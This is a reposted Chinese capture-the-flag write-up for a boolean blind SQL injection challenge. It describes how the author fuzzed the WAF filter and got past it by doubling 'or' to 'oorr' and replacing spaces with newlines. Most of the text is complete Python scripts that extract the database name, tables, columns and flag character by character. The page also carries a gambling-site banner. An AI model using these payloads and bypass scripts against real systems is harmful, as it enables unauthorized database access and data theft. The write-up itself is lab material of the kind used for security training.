必威体育Betway必威体育官网
当前位置:首页 > IT技术

认真一点!-实验吧

时间:2019-09-11 10:40:00来源:IT技术作者:seo实验室小编阅读:89次「手机版」
 

认真

这个题其实是个布尔盲注题,怎么说,正常是you are in,报错是you are not in,触发waf是sql injection detected

然后fuzz一下,图我就不贴了,做的时候忘了截下图

结果大概是过滤了and,空格,逗号,union,+

这里有个坑,fuzz的时候or是可以用的,但是尝试id = 1'/**/or/**/'1'='1的时候报you are not in,不应该啊

试了几下,后台好像是匹配到or就会删去,这里用oorr就可以解决了

剩下的,就是布尔盲注了

先爆数据库名长度

import requests
print("start")
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php "
for i in range(1,30):
    key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
    res = requests.post(url,data=key).text
    print(i)
    if str in res:
        print('database length: %s'%i)
        break
print("end!")

18个,然后就是爆数据库

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]._"
database = ''
print('start')
for i in range(1,19):
    for j in guess:
        key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
        res = requests.post(url,data=key).text
        print('............%s......%s.......'%(i,j))
        if str in res:
            database += j
            break
print(database)
print("end!")

表长度

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = 1
print("start")
while True:
    res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0" % i
    res = res.replace(' ',chr(0x0a))
    key = {'id':res}
    r = requests.post(url,data=key).text
    print(i)
    if str in r:
        print("length: %s"%i)
        break
    i+=1
print("end!")

表名(这里是用@分隔开了表名,有两张表)

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
table = ""
print("start")
for i in range(1,12):
    for j in guess:
        res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
        res = res.replace(' ', chr(0x0a))
        key = {'id':res}
        r = requests.post(url,data=key).text
        print(i)
        if str in r:
            table += j
            break
print(table)
print("end!")

列宽

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = 1
print("start")
while True:
    res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i
    res = res.replace(' ',chr(0x0a))
    key = {'id':res}
    r = requests.post(url,data=key).text
    print(i)
    if str in r:
        print("length: %s"%i)
        break
    i += 1
print("end!")

列名

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
column = ""
print("start")
for i in range(1,6):
    for j in guess:
        res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
        res = res.replace(' ',chr(0x0a))
        key = {'id':res}
        r = requests.post(url,data=key).text
        print("......%s.........%s........."%(i,j))
        if str in r:
            column+=j
            break
print(column)
print("end!")

很明显,flag表flag列,dump一下就行了

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
flag = ""
print("start")
for i in range(1,20):
    for j in guess:
        res = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,j)
        res = res.replace(' ',chr(0x0a))
        key = {'id':res}
        r = requests.post(url,data=key).text
        'print("........%s..........%s........"%(i,j))'
        if str in r:
            flag+=j
            print(flag)
            break
print(flag)
print("end!")

flag get√

不过这里有个错误,我没有把空格考虑进去,然后那个减号其实是空格2333

相关阅读

M4 SPI通讯实验

SPI 是英语 Serial Peripheral interface 的缩写,顾名思义就是串行外围设备接口。是 Motorola首先在其 MC68HCXX 系列处理器上定义

2018年,这位创业的爸爸希望儿子能长大得慢一点

水月馆,位于瓷都景德镇的三宝蓬艺术聚落,是全球最大的设计集团洛可可旗下的洛客众创平台,在瓷都的新起点。有人说,水月馆是三宝蓬艺术

你是否有认真设计过找回密码的流程?

如果你的产品中设计了账号+密码登录的体系,用户难免会忘记登录密码,所以你的产品流程里就难免会有「找回密码」的分支。找回密码功

一点资讯李亚离职,后者自2015年起任一点资讯CEO

A5创业网(公众号:iadmin5)1月22日报道,昨天晚上,一点资讯发布内部信,根据内容显示一点资讯CEO李亚被免除职务,任旭阳接任CEO一职。对于此

什么样的App,能在今日头条、一点资讯、澎湃新闻等产品

图片版权所属:站长之家声明:本文来自于微信公众号三节课(ID:sanjieke01),作者:司林,授权站长之家转载发布。“对于新闻资讯类的App来说,

分享到:

栏目导航

推荐阅读

热门阅读